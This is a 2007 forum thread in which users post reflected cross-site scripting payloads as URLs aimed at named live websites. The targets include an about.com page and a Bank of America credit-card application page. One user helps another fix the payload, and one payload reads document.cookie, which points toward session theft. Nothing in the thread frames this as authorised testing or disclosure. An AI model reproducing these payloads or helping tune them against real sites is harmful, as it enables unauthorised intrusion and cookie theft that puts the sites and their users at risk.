PDA

Просмотр полной версии : Question

Fugitif
14.10.2007, 23:34
hey ppl I have tried a xss in this site

http://windows.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif% 22)%3C/script%3E


what the hell is this error ? :)



';xg="Focus on Windows";zcs='' zFDT='0' zFST='' zOr='7AEJYC0D20SA3T08';zTbO=1;zp0=zp1=zp2=zp3=0;zD c=1;zfs=0 zSm=zSu=zhc=zpb=zgs=zdn='';zFS='';zFD='' zDO=zis=1;zpid=zi=zRf=ztp=zpo=0;zdx=20;zfx=100;zJs =13 zi=1;zz=';72890=2-1-1299;272890=2-1-1299;46860=2-1-12-1;246860=2-1-12-1';zx='3-1-1399';zde=10;zdp=1440;zds=1440;zfp=100;zfs=100;zfd =100;zdd=20;zDc=1;;zhc='';zGTH=1; zGo=0;zG=1;zTac=1 //-->
bul.666
15.10.2007, 12:00
Try it:
http://windows.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=%3Cscript%3Ealert('XSS%20BY%20Fugitif')%3C/script%3E
Or Add "> to the beginning of a line in your code:
http://windows.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn="><script>alert('XSS BY Fugitif')</script>
Fugitif
15.10.2007, 21:06
now he works but only with IE ,with firefox I have the same problem....

thanks for your answer brotha :)
freddi
15.10.2007, 21:10
but i dont have any problem.
bul.666
15.10.2007, 21:56
me too
Fugitif
05.11.2007, 00:47
another one :)

look at this:


https://wwwn.applyonlinenow.com/USCCapp/Ctl/entry?sc=FABDFB&mc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


error:


); cmTriggered = false; function triggerAppStart() { if (!cmTriggered) { cmTriggered = true; cmCreateApplicationTags("Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "CRD APP - ao", "150", "Your Information - Clicked", false, false, "", false, "CARD:AOLN:USCC:ao", true, false, false, null, "8AMC FABDFB", "119420943891120", null, null, null, null, null, null, null, "BANK OF AMERICA WORLD MASTERCARDREG WITH WORLDPOINTS WORLDCARD MASTERCARD", "CREDITCARD", false); cmCreateConversionEventTag("App View to Start", "2", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); cmCreateConversionEventTag("App Start to Submit", "1", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); } } //-->